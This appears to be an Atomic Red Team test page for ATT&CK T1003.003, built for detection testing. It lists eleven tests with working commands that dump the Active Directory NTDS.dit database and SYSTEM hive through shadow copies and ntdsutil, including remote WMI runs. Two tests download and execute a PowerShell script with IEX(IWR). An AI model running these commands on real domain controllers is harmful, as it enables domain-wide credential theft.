T1003.003
OS Credential Dumping: NTDS
Description from ATT&CK
Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in
%SystemRoot%\NTDS\Ntds.ditof a domain controller.(Citation: Wikipedia Active Directory)In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
- Volume Shadow Copy
- secretsdump.py
- Using the in-built Windows tool, ntdsutil.exe
- Invoke-NinjaCopy
Atomic Tests
- Atomic Test #1: Create Volume Shadow Copy with vssadmin
- Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy
- Atomic Test #3: Dump Active Directory Database with NTDSUtil
- Atomic Test #4: Create Volume Shadow Copy with WMI
- Atomic Test #5: Create Volume Shadow Copy remotely with WMI
- Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl
- Atomic Test #7: Create Volume Shadow Copy with Powershell
- Atomic Test #8: Create Symlink to Volume Shadow Copy
- Atomic Test #9: Create Volume Shadow Copy with diskshadow
- Atomic Test #10: Copy NTDS in low level NTFS acquisition via MFT parsing
- Atomic Test #11: Copy NTDS in low level NTFS acquisition via fsutil
Atomic Test #1: Create Volume Shadow Copy with vssadmin
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
Supported Platforms: Windows
auto_generated_guid: dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| drive_letter | Drive letter to source VSC (including colon) | string | C: |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
vssadmin.exe create shadow /for=#{drive_letter}Dependencies: Run with command_prompt!
Description: Target must be a Domain Controller
Check Prereq Commands
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNTGet Prereq Commands
echo Sorry, Promoting this machine to a Domain Controller must be done manuallyAtomic Test #2: Copy NTDS.dit from Volume Shadow Copy
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
This test requires steps taken in the test "Create Volume Shadow Copy with vssadmin". A successful test also requires the export of the SYSTEM Registry hive. This test must be executed on a Windows Domain Controller.
Supported Platforms: Windows
auto_generated_guid: c6237146-9ea6-4711-85c9-c56d263a6b03
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| vsc_name | Name of Volume Shadow Copy | string | \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 |
| extract_path | Path for extracted NTDS.dit | path | C:\Windows\Temp |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVECleanup Commands
del "#{extract_path}\ntds.dit" >nul 2> nul
del "#{extract_path}\VSC_SYSTEM_HIVE" >nul 2> nul
del "#{extract_path}\SYSTEM_HIVE" >nul 2> nulDependencies: Run with command_prompt!
Description: Target must be a Domain Controller
Check Prereq Commands
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNTGet Prereq Commands
echo Sorry, Promoting this machine to a Domain Controller must be done manuallyDescription: Volume shadow copy must exist
Check Prereq Commands
if not exist #{vsc_name} (exit /b 1)Get Prereq Commands
echo Run "Invoke-AtomicTest T1003.003 -TestName 'Create Volume Shadow Copy with vssadmin'" to fulfill this requirementDescription: Extract path must exist
Check Prereq Commands
if not exist #{extract_path} (exit /b 1)Get Prereq Commands
mkdir #{extract_path}Atomic Test #3: Dump Active Directory Database with NTDSUtil
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of subsequent domain controllers without the need of network-based replication.
Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory.
Supported Platforms: Windows
auto_generated_guid: 2364e33d-ceab-4641-8468-bfb1d7cc2723
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_folder | Path where resulting dump should be placed | path | C:\Windows\Temp\ntds_T1003 |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
mkdir #{output_folder}
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q qCleanup Commands
rmdir /q /s #{output_folder} >nul 2>&1Dependencies: Run with command_prompt!
Description: Target must be a Domain Controller
Check Prereq Commands
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNTGet Prereq Commands
echo Sorry, Promoting this machine to a Domain Controller must be done manuallyAtomic Test #4: Create Volume Shadow Copy with WMI
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
Supported Platforms: Windows
auto_generated_guid: 224f7de0-8f0a-4a94-b5d8-989b036c86da
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| drive_letter | Drive letter to source VSC (including colon and backslash) | string | C:\ |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
wmic shadowcopy call create Volume=#{drive_letter}Dependencies: Run with command_prompt!
Description: Target must be a Domain Controller
Check Prereq Commands
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNTGet Prereq Commands
echo Sorry, Promoting this machine to a Domain Controller must be done manuallyAtomic Test #5: Create Volume Shadow Copy remotely with WMI
This test is intended to be run from a remote workstation with domain admin context. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
Supported Platforms: Windows
auto_generated_guid: d893459f-71f0-484d-9808-ec83b2b64226
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| drive_letter | Drive letter to source VSC (including colon and backslash) | string | C:\ |
| target_host | IP Address / Hostname you want to target | string | localhost |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter}Dependencies: Run with command_prompt!
Description: Target must be a reachable Domain Controller, and current context must be domain admin
Check Prereq Commands
wmic /node:"#{target_host}" shadowcopy list briefGet Prereq Commands
echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl
This test is intended to be run from a remote workstation with domain admin context. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.
Supported Platforms: Windows
auto_generated_guid: 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| source_path | File to shadow copy | string | c:\windows\ntds\ntds.dit |
| target_path | Target path of the result file | string | c:\ntds.dit |
| target_host | IP Address / Hostname you want to target | string | localhost |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}"Dependencies: Run with command_prompt!
Description: Target must be a reachable Domain Controller, and current context must be domain admin
Check Prereq Commands
wmic /node:"#{target_host}" shadowcopy list briefGet Prereq Commands
echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)Atomic Test #7: Create Volume Shadow Copy with Powershell
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
Supported Platforms: Windows
auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| drive_letter | Drive letter to source VSC (including colon) | string | C:\ |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
(gwmi -list win32_shadowcopy).Create('#{drive_letter}','ClientAccessible')Atomic Test #8: Create Symlink to Volume Shadow Copy
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
Supported Platforms: Windows
auto_generated_guid: 21748c28-2793-4284-9e07-d6d028b66702
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| drive_letter | Drive letter to source VSC (including colon) | string | C: |
| symlink_path | symlink path | string | C:\Temp\vssstore |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
vssadmin.exe create shadow /for=#{drive_letter}
mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1Atomic Test #9: Create Volume Shadow Copy with diskshadow
This test is intended to be run on a domain controller An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit
Supported Platforms: Windows
auto_generated_guid: b385996c-0e7d-4e27-95a4-aca046b119a7
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| filename | Location of the script | Path | PathToAtomicsFolder\T1003.003\src\diskshadow.txt |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
mkdir c:\exfil
diskshadow.exe /s #{filename}Atomic Test #10: Copy NTDS in low level NTFS acquisition via MFT parsing
This test is intended to be run on a domain Controller.
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
Supported Platforms: Windows
auto_generated_guid: f57cb283-c131-4e2f-8a6c-363d575748b2
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| extract_path | Path for extracted NTDS.dit | string | C:\Windows\Temp |
| script_url | URL to UnderlayCopy script | url | https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1 |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVECleanup Commands
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinueAtomic Test #11: Copy NTDS in low level NTFS acquisition via fsutil
This test is intended to be run on a domain Controller.
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
Supported Platforms: Windows
auto_generated_guid: c7be89f7-5d06-4321-9f90-8676a77e0502
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| extract_path | Path for extracted NTDS.dit | string | C:\Windows\Temp |
| script_url | URL to UnderlayCopy script | url | https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1 |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVECleanup Commands
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinueAtomic test(s) for this technique last updated: 2026-02-13 02:45:07 UTC